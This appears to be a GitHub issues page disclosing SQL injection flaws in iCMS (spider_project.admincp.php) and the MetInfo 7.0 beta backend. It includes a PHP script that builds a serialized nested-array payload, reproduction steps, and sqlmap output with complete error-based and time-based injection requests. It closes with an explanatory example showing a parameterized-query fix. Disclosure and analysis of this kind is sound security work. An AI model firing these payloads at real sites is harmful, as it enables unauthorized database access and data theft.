cve-test's Issues
There is a SQL injection in spider_project.admincp.php of iCMS
The cause of the vulnerability is similar to issue 59,
but the payload needs a two-dimensional array, which is different from the previous one.
<?php
// Build the nested (two-dimensional) array carrying the test value,
// then serialize and base64-encode it so it can be saved as the import file
$arr = array("key" => array("name" => "test' or sleep(5) or '"));
$ser_arr = serialize($arr);
$ser_b64 = base64_encode($ser_arr);
echo $ser_b64;
?>
Steps:
- save the payload output in a txt file.
- import the file as a scheme
- see the difference in the return time
MetInfo7.0 beta backend SQL injection
Vulnerability Name: Metinfo CMS Background SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://www.metinfo.cn/upload/file/MetInfo7.0.0beta.zip
Version: V7.0.0 beta
We can see the web application uses GPC to filter variables in the form.
code in app/system/entrance.php:71
But the developers use the get_sql function for secondary filtering, which breaks the escaping of single quotes.
code in app/system/tags/admin/index.class.php:171
Payload:
Attack with sqlmap:
Multipart-like data found in POST data. Do you want to process it? [Y/n/q]
[18:25:17] [INFO] resuming back-end DBMS 'mysql'
[18:25:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MULTIPART title ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"
test' WHERE 5805=5805 AND (SELECT 3007 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(3007=3007,1))),0x717a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aAqw
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"
sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"
4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"
save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"
test' WHERE 2052=2052 AND SLEEP(5)-- YLsI
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"
sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"
4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"
save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--
---
[18:25:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.6.9
back-end DBMS: MySQL >= 5.0
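The two reports above describe the same class of mistake from two angles: an input filter that does not reach every value, and a second filter that undoes the first. The following PHP is an added illustration, not iCMS or MetInfo code; `gpc_escape_shallow`, `gpc_escape_deep`, `build_query` and `find_by_title` are hypothetical, and `stripslashes()` stands in for the unseen `get_sql()` as an assumption.

```php
<?php
// Added example (not iCMS or MetInfo code). Models two filtering failures:
// a GPC-style filter that escapes only top-level strings misses a value
// nested in a two-dimensional array (iCMS report), and a slash-stripping
// "secondary filter" undoes the escaping (MetInfo report; the real
// get_sql() is not on the page, so stripslashes() is assumed here).

// Hypothetical GPC-style filter: escapes strings one level deep only.
function gpc_escape_shallow(array $in): array {
    foreach ($in as $k => $v) {
        if (is_string($v)) { $in[$k] = addslashes($v); }
    }
    return $in;
}

// Recursive variant: walks nested arrays so no string is skipped.
function gpc_escape_deep(array $in): array {
    foreach ($in as $k => $v) {
        if (is_array($v))      { $in[$k] = gpc_escape_deep($v); }
        elseif (is_string($v)) { $in[$k] = addslashes($v); }
    }
    return $in;
}

// String concatenation that trusts upstream escaping (the unsafe pattern).
function build_query(string $name): string {
    return "SELECT * FROM scheme WHERE name = '" . $name . "'";
}

// Case 1: constructed nested array matching the imported scheme payload.
$scheme  = array("key" => array("name" => "test' or sleep(5) or '"));
$shallow = gpc_escape_shallow($scheme);   // inner string is never touched
$deep    = gpc_escape_deep($scheme);      // inner quote is escaped
echo build_query($shallow['key']['name']), "\n"; // quote lands in SQL raw
echo build_query($deep['key']['name']), "\n";    // quote arrives as \'

// Case 2: escaping followed by a slash-stripping secondary filter.
$title = "test' WHERE 2052=2052 AND SLEEP(5)-- ";
$once  = addslashes($title);      // GPC-style escaping
$twice = stripslashes($once);     // stand-in for the secondary filter
var_dump($twice === $title);      // bool(true): the raw quote is back

// Fix: bind values so correctness never depends on escaping at all.
function find_by_title(PDO $db, string $title): array {
    $stmt = $db->prepare("SELECT * FROM tags WHERE title = ?");
    $stmt->execute([$title]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

Run with `php` from the command line; the two echoed queries show the difference between the shallow and deep filters, and the `var_dump` shows why a second pass that strips slashes cannot be layered on top of escaping.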